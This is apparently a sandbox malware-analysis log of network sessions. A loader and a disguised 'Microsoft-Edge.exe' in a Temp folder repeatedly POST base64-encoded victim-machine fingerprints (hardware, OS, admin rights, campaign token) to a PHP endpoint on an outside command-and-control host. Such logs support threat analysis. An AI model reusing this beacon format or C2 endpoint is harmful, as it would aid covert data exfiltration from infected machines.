                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BGQDdqHM0fSSM4IGenfizZGtsOLm6YJKwW8Ny6VBvHJ7Sv%2B%2BzHeIpAN9Fy4DnUTsFHMsHGfxex85hFAQWgXL%2BU3bjudJsqp1HzHHCm7UC817DlDZnc9bv5hxGYL98rDJxAQiDp%2BxVzfb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a59ecd14379-EWR
                                                                                                                                                                2024-09-27 15:42:19 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                19192.168.2.449773172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:20 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:21 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:21 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTQdRws7pK%2BydJqS3Vy5h1T4N%2FZryMK1idHZk1ypJJy0u1CXBn87ftrM1nTywgovD3QT1cGsYYUUfLgV5d4R8mt3jWSAkWkNtUOKBsKpA5ZZO6c7RGKn5ArhEvFTrl3dTOetVdKoZpf5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a6468b30f98-EWR
                                                                                                                                                                2024-09-27 15:42:21 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                20192.168.2.449774172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:20 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:21 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:21 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iK34POesKNt0ofC0CBs4c252LzFQtWhNnBh8yitEtKpj2XqGZbO34v%2F9WZUZL7b3D2%2FrXGNWT1KjpjOCEdFYrk2%2F6itXifY0lDxrVD%2Fzmo9RFfzl0O8liQAWp8WDUU9eV8dVU243VFJO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a646d0a426b-EWR
                                                                                                                                                                2024-09-27 15:42:21 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                21192.168.2.449776172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:22 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:22 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:22 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DtbRYelX451JX3HxCTMDmSFd5RIgacvc49F80JBVYrnidw0fz3T8%2FaZht5i73oUwYtWsO%2BylY1MYCjNCUXNw%2FBsOdHMA51GYIWX2Ks2bw%2BP1m96YjM%2BoTm1C0U5noPyk1Urdlna2NFlH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a6c6ba08cdc-EWR
                                                                                                                                                                2024-09-27 15:42:22 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                22192.168.2.449777172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:22 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:22 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:22 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UVJ1J%2B9%2BbvnqxwBjzyYVPYSV7rNvVM%2B1plh5duOw0bpAyWSHO3gzJc231Z%2BzQr2LkVtshwM0M2zRIuODgi8LNTkv3jivHiFLuZs1UCVN51DE2WI3nmNmvJ%2FWilXov3VnbJH%2F3mk8K6K7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a6d5c0fc327-EWR
                                                                                                                                                                2024-09-27 15:42:22 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                23192.168.2.449779172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:23 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:23 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:23 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2kmJzY%2FaKXT58af1qB9EDtZ2bq8w692dYEdA74KF1qMoYjsTgfhGkOO81GC1tR2awMJ%2FcEaCnwCSyfq2XTGBpLyu%2BYkzkvsDh3W36906HFwi5LvMptdeadc8y08J6BFeYIuVEBPFNGx5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a747a7342f1-EWR
                                                                                                                                                                2024-09-27 15:42:23 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                24192.168.2.449780172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:23 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:23 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:23 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1OtNGi%2F%2BQikQ2oXRg7aZSWiAyJhBKylqiDo%2Bk%2B64xfc1UKjGuQVzHXsrQGBB8pTnJBO46pTiT6gxUHfVddXmPJoUW3DPT%2FUXx6bGoYQvcxvY2JRedMvt0844fEX7xn%2BTfhH0pXd33Xle"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a758a8118c0-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-09-27 15:42:23 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                25192.168.2.449783172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:26 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:26 UTC632INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:26 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yr43LtwcjOvWfR%2FUlW1BnSVuG%2BkT7HdlddHphQqHASU65Lc4xGg%2BctCMXNHDKZSfjkf8Xt%2Fwg1XhzREQUbmo3Ld%2BS5EGg95SgsNZmY%2BnjiVp5PqCE0f6%2F28Wz2%2BqI0ElnefPiCSngwlP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a85ad7e5e73-EWR
                                                                                                                                                                2024-09-27 15:42:26 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                26192.168.2.449782172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:26 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:26 UTC630INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:26 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fOCss7l%2FSb4Zk8oDftSwRIBLB%2BxrrZqMgFD7r3Fty0n7S3B5s5xU%2BmrLxDkEsCs3jygR7q%2FaqKmUSRr6pAJL41Laf%2B1CbEmGnABtPg1rj%2BHirEnQDMkGdn1tHo%2FSWDV5M819WqOdyRLb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a85a8a3437a-EWR
                                                                                                                                                                2024-09-27 15:42:26 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                27192.168.2.449786172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:27 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:27 UTC630INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:27 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NEcFgjg%2FHgbOWO%2F%2FjQ0GWYBiki9ja8VMk%2FQ%2FWDVzXE81A7iDPHD%2BtoBNADhiVQsPc5qDIm2YFDsAr05ZeC%2B3cB5oA6yTPZEanm60dWO9cllXOhtqwNHRCsYEWVH1MA8fwehXru6qLt5z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a8e69024240-EWR
                                                                                                                                                                2024-09-27 15:42:27 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                28192.168.2.449785172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:27 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:27 UTC628INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:27 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XNa4ft4WAex%2Fbv48fSXlqJl8DzVQDr1HmNziFyamaOJZ2ZKOu61OldP2m1KcIysxwrtTFSBEf60%2BRDaVWJ9R3D033YZLz7PyiIFT0GndIe%2Fce3SwPfGz7Fd8h%2BKs6E4W27Vf%2BrI%2FQi9A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a8e8e0dc338-EWR
                                                                                                                                                                2024-09-27 15:42:27 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                29192.168.2.449788172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
